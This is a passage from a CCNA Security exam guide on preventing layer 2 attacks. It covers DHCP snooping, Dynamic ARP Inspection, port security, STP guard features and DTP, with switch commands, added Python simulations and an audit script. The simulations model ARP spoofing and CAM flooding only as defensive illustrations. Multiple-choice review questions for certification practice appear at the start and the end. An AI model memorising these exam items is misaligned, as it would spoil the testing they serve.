D. STP
16. Which attack is only an issue on switches that use “native” VLANs?
A. Switch spoofing
B. Double tagging
C. ARP pollution
D. CAM overflow
17. Which service introduces a vulnerability that when leveraged by a malicious individual can result in an inability of hosts to communicate (constituting a DoS attack) and peer-to-peer attacks?
A. DHCP
B. DNS
C. DTP
D. NAT
18. Which of the following attacks can lead to a phishing attack?
A. DHCP spoofing
B. CAM overflow
C. Double tagging
D. Switch spoofing
19. Which attack occurs on trunk links?
A. Double tagging
B. ARP pollution
C. CAM overflow
D. DHCP spoofing
20. What protocol is used to negotiate the formation of a trunk link?
A. CDP
B. NTP
C. DTP
D. VTP
Chapter 6
Preventing Layer 2 Attacks
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
4.5 Mitigation procedures
Implement DHCP snooping
Implement Dynamic ARP Inspection
Implement port security
Describe BPDU guard, root guard, loop guard
Verify mitigation procedures
Now that you understand some of the layer 2 attacks that can be aimed at your switching infrastructure, you are ready to learn about the mitigations that are available to address each of these attacks. This chapter will discuss how to prevent STP attacks, ARP pollution, MAC spoofing, and CAM overflows. The chapter will also discuss the prevention of VLAN hopping attacks and rogue DHCP servers. Finally, the chapter will discuss how to verify the proper application of the mitigations discussed in the chapter.
In this chapter, you will learn the following:
Mitigations for common layer 2 attacks
Configuring DHCP Snooping
In Chapter 5 you learned that a rogue DHCP server can create significant security issues for your environment. When a rogue DHCP server issues an incorrect IP address, an incorrect subnet mask, and incorrect default gateway information to the host, it can prevent proper communications for those hosts, amounting to a DoS attack. Moreover, it can also result in traffic being directed through this device so that it captures all traffic. Finally, if the rogue DHCP server issues an incorrect DNS server address, it can result in a rogue DNS server responding to queries for sensitive website IP addresses such as banks with incorrect information that, when used by unsuspecting users, can lead to the capture of user credentials.
There is a way to prevent all of this, however, by implementing a feature called DHCP snooping. This feature works by filtering the DHCP messages sent by the rogue DHCP server so that they are never received by the unsuspecting hosts. It also uses the messages sent to and from the legitimate DHCP server to build a binding database that maps the MAC addresses of hosts to the IP addresses they received from the legitimate DHCP server.
DHCP snooping is implemented on the switches in the network, so it is a layer 2 solution. The switch ports on the switch are labeled either trusted or untrusted. Trusted ports are those that will allow a DHCP message to traverse. The only access ports on the switch that should be labeled as trusted are those leading to legitimate DHCP servers.
All interswitch ports should also be labeled as trusted since they might be used to send the DHCP message from the legitimate server to hosts located on a switch to which the legitimate DHCP server is not connected. All other access ports on the switches should be labeled as untrusted (or left unlabeled, in which case they will be considered untrusted). This prevents a rogue DHCP server connected to one of these ports from responding to the DHCP discover packets sent by the hosts. As a matter of fact, any server response packets (DHCPOFFER, DHCPACK, or DHCPNAK) will be dropped by these interfaces.
Figure 6.1 shows an example of how these ports should be configured in a sample network containing both a legitimate and a rogue DHCP server. Notice in this scenario that the legitimate DHCP server is located on the other side of a network of layer 3 switches; therefore, all ports leading from the layer 2 switches toward the legitimate DHCP server are labeled as trusted so that any of these ports can be used for communication by the legitimate DHCP server. Also notice that all access ports on the two layer 2 switches have been left unlabeled, which makes them untrusted. This prevents the rogue DHCP server from responding to any DHCP discover packets.
FIGURE 6.1 DHCP snooping
From a high level, the steps that are required to implement DHCP snooping are as follows:
1. Enable DHCP snooping globally on each switch.
2. Enable DHCP snooping explicitly for each VLAN with members on the switch.
3. Label all access ports that connect to legitimate DHCP servers as trusted.
4. Leave all other access ports unlabeled, which makes them untrusted.
5. Label any interswitch ports as trusted.
An optional step you may want to take is to specify a file in flash memory to hold the DHCP snooping database that is created by “snooping” on legitimate DHCP server traffic. In the absence of doing this, the database will be stored in RAM. So, if you want the database to persist through a switch reload, configure a file in flash for this purpose.
Let’s go over each of these steps using Figure 6.1 as our guide. First let’s enable DHCP snooping globally on the layer 2 switches. I’ll call them SW67 and SW68.
SW67(config)#ip dhcp snooping
SW68(config)#ip dhcp snooping
This is not indicated on the diagram, but let’s assume you have four VLANs, VLANs 2–5, on the two switches. Now let’s explicitly enable DHCP snooping on those VLANs.
SW67(config)#ip dhcp snooping vlan 2-5
SW68(config)#ip dhcp snooping vlan 2-5
There are no access ports on the two layer 2 switches that contain legitimate DHCP servers, so you can leave them all unlabeled, which will make them untrusted by default. However, you will need to mark all four of the interfaces leading from the layer 2 switches to the layer 3 switches as trusted. While not labeled on the diagram, let’s identify these as gi0/1 and gi0/2 on SW67 and gi0/3 and gi0/4 on SW68.
SW67(config)#int range gi0/1-2
SW67(config-if-range)#ip dhcp snooping trust
SW68(config)#int range gi0/3-4
SW68(config-if-range)#ip dhcp snooping trust
Finally, just to see how it’s done, let’s configure a file in flash for the DHCP snooping database. Then if the switches reload for some reason, they will retain this database. Call the file mysnooper on both devices.
SW67(config)#ip dhcp snooping database flash:/mysnooper
SW68(config)#ip dhcp snooping database flash:/mysnooper
In the next section, I’ll show you an additional use for the DHCP snooping database. Stay tuned!
Configuring Dynamic ARP Inspection
As you learned in Chapter 5, ARP attacks are targeted at the ARP cache that is used by all devices to store recently resolved IP address to MAC address mappings. These mappings become known to the hosts through the ARP broadcast process and are stored in the ARP cache for a short period of time to eliminate the need to repeat the ARP broadcast process for every packet in a large stream of packets. Each time an entry in the cache is used, the timer that ages it out of the cache is updated. ARP pollution attacks use gratuitous ARP packets to force incorrect entries into the ARP cache, with the aim of sending traffic to the attacker that should be sent elsewhere.
The attack can be prevented by implementing a feature on the switches called Dynamic ARP Inspection (DAI). This feature requires that DHCP snooping also be enabled because it depends on the DHCP snooping database that is created when DHCP snooping is enabled. When enabled, it allows the switch to intercept ARP packets on ports that you designate as untrusted and will verify that each intercepted packet has a valid MAC to IP address mapping before updating the ARP cache and forwarding the packet. This validation is performed by using the DHCP snooping database.
When properly configured, DAI operates as shown in Figure 6.2. An attacker sends a gratuitous ARP message to pollute the ARP cache of the host at 10.1.1.2. When the switch receives this message, it consults the DHCP snooping database, and when discovering that the packet contains an incorrect MAC to IP address mapping, it drops the packet.
FIGURE 6.2 DAI in action
In the scenario shown in Figure 6.2, the DAI implementation would require that the ports on the switch connected to the hosts be labeled as untrusted (for the purposes of DAI) and all interswitch ports be labeled as trusted. Bypassing the security check between switches is safe if DAI is enabled on all of the switches because the switches will only be sending packets to one another that have already been checked when received by the switch.
In cases where interfaces with static IP addresses are present (such as default gateways on routers), additional steps are required because those interfaces and their IP to MAC address mappings will not be found in the DHCP snooping database, since that’s not how those interfaces got their IP addresses. These interfaces will require that you create a type of ACL on the switch called an ARP ACL. This ACL identifies the correct IP to MAC address mapping for the interface, and the ACL is referenced as a filter in the DAI configuration. This makes the ACL available to the DAI process as an addition to the DHCP snooping database.
To enable DAI, the high-level steps are as follows:
1. Enable DAI for each VLAN.
2. Specify interswitch ports as trusted.
3. Leave all other ports at the default of untrusted.
4. For any interfaces such as default gateways that have static IP addresses, create an ARP ACL that maps the IP address of the interface to the MAC address of the interface.
5. Reference any ARP ACLs that have been created when enabling DAI.
Using the diagram in Figure 6.2, let’s perform each step. First let’s enable DAI on the switch for VLAN 3.
SW69(config)#ip arp inspection vlan 3
While not shown in the diagram, let’s pretend the switch has an uplink called gi0/4, which connects to another switch. You need to mark this interface as trusted, so let’s do it.
SW69(config)#int gi0/4
SW69(config-if)#ip arp inspection trust
All other ports need to be labeled untrusted, which is the default, so you can leave them as they are. Since the default gateway on the router has a static IP address of 10.1.1.1, you need to create an ARP ACL that creates the IP to MAC address mapping. Let’s do this and use the MAC address aaaa.bbbb.cccc. Its name will be StaticIP-VLAN3. Notice that this is an instance where an ACL is used not to allow or block traffic but to identify an item (in this case the IP to MAC address mapping) for special treatment.
SW69(config)#arp access-list StaticIP-VLAN3
SW69(config-arp-acl)#permit ip host 10.1.1.1 mac host aaaa.bbbb.cccc
The last item you need to take care of is to reference the name of the ARP ACL in the DAI configuration. When you do this, you also have to reference the VLAN to which it applies.
SW69(config)#ip arp inspection filter StaticIP-VLAN3 vlan 3
While you used the VLAN number in the name of the ACL, that is not what ties it to the VLAN. It is the explicit reference to VLAN 3 at the end of the command that does it.
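This Python model, added here and not the book’s code, ties together the ARP poisoning attack of Chapter 5, the DHCP snooping configuration of the previous section and the DAI steps above: DHCP server messages are dropped on untrusted ports, DHCPACKs seen on trusted ports populate the binding database, the ARP ACL supplies the static gateway mapping, and ARP packets on untrusted ports are validated against both. Port names, hosts and MAC addresses are constructed, following the 10.1.1.x addressing of Figure 6.2.

```python
"""Model of DHCP snooping and Dynamic ARP Inspection on one switch, as the
chapter describes them: DHCP server messages are dropped on untrusted
ports, DHCPACKs seen on trusted ports build the binding database, and ARP
packets on untrusted ports are validated against that database plus an
ARP ACL for statically addressed hosts.  Added example, not the book's
code; ports, hosts, MAC and IP addresses are constructed."""
from dataclasses import dataclass

DHCP_SERVER_MESSAGES = {"DHCPOFFER", "DHCPACK", "DHCPNAK"}


@dataclass(frozen=True)
class DhcpMsg:
    kind: str           # DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, DHCPACK, DHCPNAK
    client_mac: str
    yiaddr: str = ""    # address offered/assigned (OFFER and ACK)


@dataclass(frozen=True)
class ArpPkt:
    op: str             # "request" or "reply"
    sender_mac: str
    sender_ip: str


class Switch:
    def __init__(self, trusted_ports):
        self.trusted = set(trusted_ports)   # snooping trust and DAI trust
        self.bindings = {}                  # DHCP snooping database: ip -> mac
        self.arp_acl = {}                   # ARP ACL entries: ip -> mac
        self.log = []

    def arp_acl_permit(self, ip, mac):
        """Equivalent of: permit ip host <ip> mac host <mac> in an ARP ACL."""
        self.arp_acl[ip] = mac.lower()

    def dhcp_in(self, port, msg):
        """DHCP snooping: server-side messages are only allowed from trusted
        ports; a DHCPACK records the lease in the binding database."""
        if msg.kind in DHCP_SERVER_MESSAGES:
            if port not in self.trusted:
                self.log.append(f"{port}: dropped {msg.kind} from untrusted port")
                return "drop"
            if msg.kind == "DHCPACK":
                self.bindings[msg.yiaddr] = msg.client_mac.lower()
        return "forward"

    def arp_in(self, port, pkt):
        """DAI: on untrusted ports the sender IP/MAC pair must match the ARP
        ACL (checked first) or the DHCP snooping database."""
        if port in self.trusted:
            return "forward"    # interswitch link: peer switch already inspected it
        expected = self.arp_acl.get(pkt.sender_ip) or self.bindings.get(pkt.sender_ip)
        if expected != pkt.sender_mac.lower():
            self.log.append(f"{port}: DAI dropped ARP {pkt.op} claiming "
                            f"{pkt.sender_ip} is at {pkt.sender_mac}")
            return "drop"
        return "forward"


def scenario():
    """Figure 6.2-style layout: gi0/4 is the trusted uplink, hosts on fa0/x."""
    sw = Switch(trusted_ports=["gi0/4"])
    sw.arp_acl_permit("10.1.1.1", "aaaa.bbbb.cccc")   # default gateway, static IP
    results = {}
    # Legitimate server (behind the uplink) leases 10.1.1.2 to the victim.
    results["legit_ack"] = sw.dhcp_in("gi0/4", DhcpMsg("DHCPACK", "0000.1111.2222", "10.1.1.2"))
    # Rogue server on an access port tries to answer the victim's DISCOVER.
    results["rogue_offer"] = sw.dhcp_in("fa0/7", DhcpMsg("DHCPOFFER", "0000.1111.2222", "10.1.1.99"))
    # The victim's own ARP request matches its binding.
    results["victim_arp"] = sw.arp_in("fa0/1", ArpPkt("request", "0000.1111.2222", "10.1.1.2"))
    # Gratuitous ARP replies from the attacker, impersonating gateway and victim.
    results["spoof_gw"] = sw.arp_in("fa0/3", ArpPkt("reply", "dead.beef.0001", "10.1.1.1"))
    results["spoof_victim"] = sw.arp_in("fa0/3", ArpPkt("reply", "dead.beef.0001", "10.1.1.2"))
    # The gateway's genuine reply arrives over the trusted uplink.
    results["gw_reply"] = sw.arp_in("gi0/4", ArpPkt("reply", "aaaa.bbbb.cccc", "10.1.1.1"))
    # A statically addressed host with no binding and no ARP ACL entry is
    # dropped too, which is why step 4 of the procedure exists.
    results["static_no_acl"] = sw.arp_in("fa0/5", ArpPkt("request", "0000.3333.4444", "10.1.1.50"))
    return results, sw
```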
Configuring Port Security
In Chapter 5 you learned how a malicious individual could use a CAM overflow attack to fill the CAM table of the switch, resulting in the switch flooding all traffic out all ports. This basically turns the switch into a hub and thereby allows the attacker to receive all traffic, regardless of the VLAN to which the frame belongs. However, you can prevent this by using a feature called port security. This feature can control the following:
The maximum number of MAC addresses that can be seen on a port (which will solve the CAM overflow issue)
Exactly which MAC addresses can transmit on a port (preventing unauthorized access to the network)
Let’s look at how you might prevent a CAM overflow attack by limiting the number of MAC addresses that can be seen on an interface. From a high level, these are the steps required. The commands will follow later.
1. Specify the port as an access port (if not already done).
2. Enable port security on the port.
3. Specify the maximum number of MAC addresses allowed on the port.
4. Specify the action to be taken when a violation occurs.
Let’s configure these steps on a Cisco switch. First specify the port gi0/2 as an access port.
SW70(config)#int gi0/2
SW70(config-if)#switchport mode access
The next step is to enable port security on the interface. That is done with the following command:
SW70(config-if)#switchport port-security
To specify the maximum number of MAC addresses that can be seen on the port, use the following command. In this case, you are allowing two because the user has both a PC and an IP phone connected to the same port.
SW70(config-if)#switchport port-security maximum 2
Finally, let’s specify that if a violation occurs, the port will be shut down. You can also choose the following actions using alternative keywords to the shutdown keyword:
protect: The offending frame will be dropped.
restrict: The frame is dropped and an SNMP trap and a syslog message are generated.
SW70(config-if)#switchport port-security violation shutdown
With this configuration in place, the port will be protected from a CAM overflow attack. If one occurs, the port will be shut down.
Port security can also be used to specify the exact MAC addresses that are allowed on the port. This will prevent an unauthorized device from using the port. You can specify the MAC address (or addresses) manually, or you can use a cool command option called mac-address sticky that tells the port to learn the MAC addresses of the devices currently connected to the port and make those MAC addresses the only ones allowed on the port. Assuming you have specified the port as an access port and enabled port security on the port, this is easily done with this single command:
SW70(config-if)#switchport port-security mac-address sticky
With the port configured like this, the port is protected both from unauthorized devices and from CAM overflow attacks.
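The following Python model, added here and not from the book, demonstrates both the CAM overflow of Chapter 5 and the port security behaviour of this section: a fixed-size table that starts flooding once it is full, a port configured with maximum 2 under each of the three violation modes, and the difference sticky learning makes across a reload. The table size, port names and MAC addresses are constructed.

```python
"""Model of a switch's CAM table under a MAC flood and of port security on
an access port, as Chapter 5 (CAM overflow) and this section describe.
Added example, not the book's code; table size, ports and MAC addresses
are constructed."""
from collections import OrderedDict


class CamSwitch:
    """Learns source MACs per port into a table of fixed capacity; frames to
    unknown destinations are flooded out every other port."""
    def __init__(self, capacity, ports):
        self.capacity, self.ports = capacity, list(ports)
        self.cam = OrderedDict()          # mac -> port

    def learn(self, src_mac, in_port):
        if src_mac in self.cam or len(self.cam) < self.capacity:
            self.cam[src_mac] = in_port
            return True
        return False                      # table full: address not learned

    def forward(self, dst_mac, in_port):
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]
        return [p for p in self.ports if p != in_port]   # flood, hub-like


class PortSecurity:
    """switchport port-security [maximum N] [violation protect|restrict|
    shutdown] [mac-address sticky] on one access port."""
    def __init__(self, maximum=1, violation="shutdown", sticky=False):
        self.maximum, self.violation, self.sticky = maximum, violation, sticky
        self.secure_macs = []             # addresses currently allowed on the port
        self.err_disabled = False
        self.log = []

    def frame(self, src_mac):
        """Return 'accept' or 'drop' for a frame entering the port."""
        if self.err_disabled:
            return "drop"
        if src_mac in self.secure_macs:
            return "accept"
        if len(self.secure_macs) < self.maximum:
            self.secure_macs.append(src_mac)   # learn up to the maximum
            return "accept"
        # Violation: one more address than the maximum allows.
        if self.violation == "restrict":
            self.log.append(f"SNMP trap + syslog: violation by {src_mac}")
        elif self.violation == "shutdown":
            self.err_disabled = True
            self.log.append(f"port err-disabled after violation by {src_mac}")
        return "drop"                      # protect: silently dropped

    def reload(self):
        """Sticky addresses are kept in the configuration and survive a
        reload; dynamically learned secure addresses do not."""
        self.err_disabled = False
        if not self.sticky:
            self.secure_macs = []


def cam_overflow_demo():
    sw = CamSwitch(capacity=8, ports=["fa0/1", "fa0/2", "fa0/3", "fa0/4"])
    sw.learn("0000.0000.000a", "fa0/1")                 # host A, learned first
    for i in range(100):                                # attacker on fa0/4 floods
        sw.learn(f"dead.beef.{i:04x}", "fa0/4")
    learned_b = sw.learn("0000.0000.000b", "fa0/2")     # host B arrives too late
    return {
        "cam_size": len(sw.cam),
        "to_a": sw.forward("0000.0000.000a", "fa0/2"),  # still unicast
        "b_learned": learned_b,
        "to_b": sw.forward("0000.0000.000b", "fa0/1"),  # flooded; fa0/4 sees it
    }


def port_security_demo(violation):
    """PC and IP phone fill the maximum of 2; the attacker's MAC violates."""
    ps = PortSecurity(maximum=2, violation=violation, sticky=True)
    verdicts = [ps.frame(m) for m in ("0000.0000.00aa",   # user's PC
                                      "0000.0000.00bb",   # user's IP phone
                                      "dead.beef.0000",   # attacker's first MAC
                                      "0000.0000.00aa")]  # PC again
    return verdicts, ps
```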
Configuring STP Security Features
In Chapter 5 you were introduced to an attack aimed at the Spanning Tree Protocol (STP). When a malicious individual introduces a rogue switch to the switching network and the rogue switch has a superior BPDU compared to the one held by the current root bridge, the new switch assumes the position of root bridge.
Since the topology of the switching network depends on the position of the root bridge and the relative position of the other switches to the root bridge, this alters the topology in ways that not only may impact performance but may cause all traffic to traverse the new rogue switch, which will be under the management of the attacker. To prevent this from occurring, you can make use of three features: BPDU Guard, Root Guard, and Loop Guard. Let's look at all three features.
BPDU Guard
The BPDU Guard feature is designed to prevent the reception of superior BPDUs on access ports by preventing the reception of any BPDU frames on the access port. It should be implemented only on access ports, because if implemented on trunks, it would interfere with the normal operation of STP, which depends on these frames for its operation. However, it should be implemented on all access ports. When implemented, it has the effect shown in Figure 6.3. By blocking the superior BPDU sent by the attacker, the STP topology remains unchanged.
FIGURE 6.3 BPDU Guard in action
The implementation of BPDU Guard can be done at the interface level or it can be done globally, which will implement the feature on all access ports on the switch. Let's implement it first at the interface level. This is done with the following command:
SW71(config)#int gi0/5
SW71(config-if)#spanning-tree bpduguard enable
To enable this feature on all access ports, execute the following command at the global configuration prompt. You must ensure before you run this command that all access ports are configured with PortFast. This feature allows access ports to immediately proceed to the forwarding state without going through the interim port states of STP as would be done on a trunk port.
The following command will enable both PortFast and BPDU Guard on all access ports:
SW71(config)#spanning-tree portfast bpduguard default
When a violation occurs, the port will be placed in an err-disabled state and will not pass traffic until it is enabled again manually.
Root Guard
Another feature that is designed to prevent a change in the root bridge is Root Guard. This feature is also implemented on access ports. It is implemented on all ports of the root bridge. It prevents the reception of superior BPDUs only, not all BPDUs. Moreover, when a violation occurs, the port is not err-disabled as in the case with BPDU Guard. Rather, it is placed in an inconsistent state and will recover and return to a normal state when the reception of superior BPDUs ceases. This feature is implemented only at the interface level, as shown here:
SW71(config)#int gi0/5
SW71(config-if)#spanning-tree guard root
Loop Guard
An STP loop can be created when a blocking port in a redundant topology erroneously transitions to the forwarding state. This usually happens because one of the ports no longer receives STP BPDUs. In its operation, STP relies on continuous reception or transmission of BPDUs based on the port role. The STP Loop Guard feature provides additional protection against layer 2 forwarding loops (STP loops).
To prevent this anomaly from altering the STP topology, use the Loop Guard feature. This feature makes additional checks if BPDUs are not received on a nondesignated port. With Loop Guard enabled, that port moves into the STP loop-inconsistent blocking state, instead of the listening/learning/forwarding state. Without the Loop Guard feature, the port assumes the designated port role, moves to the STP forwarding state, and creates a loop.
To enable Loop Guard, use the following command:
SW77(config)#interface gigabitEthernet 1/1
SW77(config-if)#spanning-tree guard loop
Disabling DTP
In Chapter 5 you learned that a rogue switch added to your network by a malicious individual can alter your STP topology and may even cause the rogue switch to become the root bridge. If Dynamic Trunking Protocol (DTP) is enabled on your switch interfaces and if the interface is set to either dynamic desirable or dynamic auto, it is possible for a rogue switch connected to such a configured interface to become part of the STP topology. By setting the port state of the rogue switch to dynamic desirable, a trunk link will automatically be formed.
To prevent this, disable DTP on all switch interfaces. Statically set the mode of every interface to either trunk or access, as required. To disable DTP on all ports, use the following command:
SW71(config)#interface range fa0/1 - 24
SW71(config-if-range)#switchport nonegotiate
Verifying Mitigations
When using the configurations covered in this chapter, it is always a good idea to verify the successful application of each. It is also helpful to know how to check for these configurations when you are unfamiliar with a specific switch. This section will cover these verifications.
DHCP Snooping
To verify the configuration of DHCP snooping, use the show ip dhcp snooping command, as shown here. The output is truncated to show the critical parts.
SW72#sh ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
1-200
Insertion of option 82 is enabled
Interface                  Trusted    Rate limit (pps)
------------------------   -------    ----------------
FastEthernet0/1            yes        unlimited
SW72#
Note the following:
DHCP snooping is globally enabled.
It is operational on VLANs 1–200.
FastEthernet0/1 is the trusted interface.
DAI
To verify the configuration of DAI, use the show ip arp inspection command, as shown here:
Switch73#show ip arp inspection
Source Mac Validation      : Disabled
Destination Mac Validation : Disabled
IP Address Validation      : Disabled
 Vlan     Configuration    Operation   ACL Match          Static ACL
 ----     -------------    ---------   ---------          ----------
   10     Enabled          Active
 Vlan     ACL Logging      DHCP Logging      Probe Logging
 ----     -----------      ------------      -------------
   10     Deny             Deny              Off
 Vlan      Forwarded        Dropped     DHCP Drops      ACL Drops
 ----      ---------        -------     ----------      ---------
   10              0             10             10              0
 Vlan   DHCP Permits    ACL Permits  Probe Permits   Source MAC Failures
 ----   ------------    -----------  -------------   -------------------
   10              0              0              0                     0
 Vlan   Dest MAC Failures   IP Validation Failures   Invalid Protocol Data
 ----   -----------------   ----------------------   ---------------------
   10                   0                        0                       0
Note the following:
It is enabled for VLAN 10.
Ten packets have been dropped by DAI.
Port Security
To verify the configuration of port security, use the show port-security command, as shown here:
SW74#show port-security
Secure Port  MaxSecureAddr  CurrentAddr  SecurityViolation  Security Action
                (Count)       (Count)          (Count)
---------------------------------------------------------------------------
      Fa5/1             11           11                  0         Shutdown
      Fa5/5             15            5                  0         Restrict
     Fa5/11              5            4                  0          Protect
---------------------------------------------------------------------------
Total Addresses in System: 21
Max Addresses limit in System: 128
Note the following:
Port security is enabled on the Fa5/1, Fa5/5, and Fa5/11 interfaces.
There have been no violations thus far.
If a violation occurs, the Fa5/1 interface will not forward the offending traffic, will shut down, will send an SNMP trap and syslog message, and will increment the violation counter.
If a violation occurs, the Fa5/5 interface will not forward the offending traffic, will send an SNMP trap and syslog message, and will increment the violation counter, but it will still pass legitimate traffic.
If a violation occurs, the Fa5/11 interface will not forward the offending traffic, will not send an SNMP trap or syslog message, and will not increment the violation counter, but it will still pass legitimate traffic.
STP Features
In this section, you'll learn how to verify the proper application of BPDU Guard, Root Guard, Loop Guard, and DTP.
BPDU Guard
To verify that BPDU Guard has been configured correctly, execute the show spanning-tree summary totals command. Note that PortFast BPDU Guard is enabled globally on this switch.
SW75#show spanning-tree summary totals
Root bridge for: none.
PortFast BPDU Guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Spanning tree default pathcost method used is short
Name                   Blocking Listening Learning Forwarding STP Active
---------------------- -------- --------- -------- ---------- ----------
1 VLAN                        0         0        0          1          1
Root Guard
To verify that Root Guard has been configured correctly, execute the show spanning-tree interface <int id> detail command. Note that Root Guard is enabled on this port.
SW76#show spanning-tree int fa0/22 detail
Port 24 (FastEthernet0/22) of VLAN0001 is broken (Root Inconsistent)
Port path cost 19, Port priority 128, Port Identifier 128.24.
Designated root has priority 4097, address 000d.bc51.6d00
Designated bridge has priority 24577, address 0018.1820.2700
Designated port id is 128.24, designated path cost 57
Timers: message age 3, forward delay 0, hold 0
Number of transitions to forwarding state: 2
Link type is point-to-point by default
Root guard is enabled on the port
BPDU: sent 502, received 1701
Loop Guard
To verify that Loop Guard has been configured correctly, execute the show spanning-tree summary command. Note that Loop Guard is enabled.
Router#show spanning-tree summary
Switch is in pvst mode
Root bridge for: none
EtherChannel misconfig guard is enabled
Extended system ID is disabled
Portfast Default is disabled
PortFast BPDU Guard Default is disabled
Portfast BPDU Filter Default is disabled
Loopguard Default is enabled
UplinkFast is disabled
BackboneFast is disabled
Pathcost method used is short
Name                   Blocking Listening Learning Forwarding STP Active
---------------------- -------- --------- -------- ---------- ----------
Total                         0         0        0          0          0
DTP
To verify that Dynamic Trunking Protocol has been properly disabled, execute the show interfaces switchport command, as shown here:
SW1#show interfaces fastEthernet 0/24 switchport
Name: Fa0/24
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Administrative Trunking Encapsulation: negotiate
Operational Trunking Encapsulation: native
Negotiation of Trunking: Off
Note the following:
DTP negotiation is disabled (see the last line).
This is an access port.
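The checks in this section can be scripted when you have to audit a switch you are unfamiliar with. As an added example (not from the book), this Python code parses captured output of show interfaces switchport and show spanning-tree summary and reports the mitigations that are missing; the sample outputs are constructed after the ones shown above.

```python
"""Offline audit of 'show' output for the switch mitigations verified in this section."""
import re

# Constructed sample outputs, modelled on the show commands in this section.
SWITCHPORT_OK = """\
Name: Fa0/24
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Administrative Trunking Encapsulation: negotiate
Operational Trunking Encapsulation: native
Negotiation of Trunking: Off
"""

SWITCHPORT_WEAK = """\
Name: Fa0/23
Switchport: Enabled
Administrative Mode: dynamic desirable
Operational Mode: static access
Administrative Trunking Encapsulation: negotiate
Operational Trunking Encapsulation: native
Negotiation of Trunking: On
"""

STP_SUMMARY = """\
Switch is in pvst mode
Root bridge for: none
EtherChannel misconfig guard is enabled
Extended system ID is disabled
Portfast Default is disabled
PortFast BPDU Guard Default is disabled
Portfast BPDU Filter Default is disabled
Loopguard Default is enabled
UplinkFast is disabled
BackboneFast is disabled
"""


def parse_fields(output: str) -> dict:
    """Turn 'Key: value' lines (show interfaces switchport style) into a dict."""
    fields = {}
    for line in output.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def parse_flags(output: str) -> dict:
    """Turn '<feature> is enabled|disabled' lines into {feature: bool}."""
    flags = {}
    for line in output.splitlines():
        m = re.fullmatch(r"(.+?) is (enabled|disabled)", line.strip())
        if m:
            flags[m.group(1)] = m.group(2) == "enabled"
    return flags


def audit_switchport(output: str) -> list:
    """Findings for one port: DTP must be off and the mode statically set."""
    fields = parse_fields(output)
    findings = []
    if fields.get("Negotiation of Trunking", "").lower() != "off":
        findings.append("DTP negotiation is on; configure 'switchport nonegotiate'")
    mode = fields.get("Administrative Mode", "")
    if mode.startswith("dynamic"):
        findings.append(f"administrative mode is '{mode}'; "
                        "set the mode statically to access or trunk")
    return findings


def audit_stp_summary(output: str) -> list:
    """Findings for the switch-wide STP protections covered in this chapter."""
    flags = parse_flags(output)
    findings = []
    if not flags.get("PortFast BPDU Guard Default", False):
        findings.append("BPDU Guard is not on by default for PortFast ports; "
                        "configure 'spanning-tree portfast bpduguard default'")
    if not flags.get("Loopguard Default", False):
        findings.append("Loop Guard is not on by default; "
                        "configure 'spanning-tree guard loop' on the relevant interfaces")
    return findings


if __name__ == "__main__":
    print("Fa0/24:", audit_switchport(SWITCHPORT_OK) or "ok")
    print("Fa0/23:", audit_switchport(SWITCHPORT_WEAK))
    print("STP   :", audit_stp_summary(STP_SUMMARY))
```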
Summary
In this chapter, you learned to configure DHCP snooping to prevent the introduction of rogue DHCP servers. The chapter also discussed how, when combined with DHCP snooping, DAI can prevent ARP poisoning attacks. You learned how to prevent MAC overflow attacks and how to keep unauthorized devices off switch ports by using port security. Finally, the chapter discussed BPDU Guard, Root Guard, and Loop Guard, all STP features designed to prevent changes to the STP topology.
Exam Essentials
Implement DHCP snooping. Configure and verify DHCP snooping to prevent the issues caused by a rogue DHCP server and to support the application of Dynamic ARP Inspection.
Deploy DAI. Implement Dynamic ARP Inspection to prevent ARP pollution, which can lead to a man-in-the-middle attack.
Configure port security. Prevent MAC overflow attacks and the introduction of unauthorized devices to switch ports by securing the port using the port security feature.
Describe the benefits of STP security features. These features include BPDU Guard, Root Guard, and Loop Guard.
Review Questions
1. Which of the following is true of DHCP snooping?
A. It prevents the introduction of rogue switches.
B. It is implemented on routers.
C. It builds a binding database that maps the MAC addresses of hosts to the IP addresses they received from the legitimate DHCP server.
D. When implementing it, all ports should be untrusted.
2. Which DHCP packet types are dropped on untrusted interfaces protected by DHCP snooping?
A. DHCPACK
B. DHCPOFFER
C. DHCPNACK
D. All of the above
3. Which of the following features must be configured for the operation of DAI?
A. Loop Guard
B. DHCP snooping
C. Root Guard
D. BPDU Guard
4. What is required to enable DAI on an interface with a static IP address?
A. An ACL
B. Loop Guard
C. PortFast
D. Root Guard
5. Which of the following commands causes the switch to drop the offending traffic when a violation occurs but neither shuts down the interface nor sends syslog messages?
A. switchport port-security violation shutdown
B. switchport port-security violation restrict
C. switchport port-security violation deny
D. switchport port-security violation protect
6. Which attack does the switchport port-security maximum 2 command prevent?
A. MAC spoofing
B. CAM overflow
C. Rogue DHCP
D. ARP spoofing
7. Which of the following should be implemented only on access ports?
A. BPDU Guard
B. Root Guard
C. Loop Guard
D. DTP
8. Which type of traffic is prevented on ports where Root Guard is enabled?
A. All traffic
B. All BPDUs
C. Superior BPDUs
D. Inferior BPDUs
9. What state does a port configured with Loop Guard enter when the reception of BPDUs stops?
A. Shutdown
B. Loop-inconsistent
C. Err-disabled
D. Blocking
10. Which feature is disabled with the command switchport nonegotiate?
A. STP
B. DTP
C. VTP
D. CDP
11. In the following configuration, which port will not forward the offending traffic, will not send an SNMP trap or syslog message, and will not increment the violation counter but will still pass legitimate traffic?
SW74#show port-security
Secure Port  MaxSecureAddr  CurrentAddr  SecurityViolation  Security Action
                (Count)       (Count)          (Count)
      Fa5/1             11           11                  0         Shutdown
      Fa5/5             15            5                  0         Restrict
     Fa5/11              5            4                  0          Protect
     Fa5/12              3            2                  0         Shutdown
---------------------------------------------------------------------------
Total Addresses in System: 21
Max Addresses limit in System: 128
A. Fa5/1
B. Fa5/5
C. Fa5/11
D. Fa5/12
12. Which of the following features prevents the introduction of a rogue switch?
A. BPDU Guard
B. DAI
C. DHCP snooping
D. Loop Guard
13. Which command should be configured on a port where the legitimate DHCP server resides?
A. ip dhcp snooping trust
B. ip dhcp snooping enable
C. ip dhcp snooping
D. ip dhcp snooping untrust
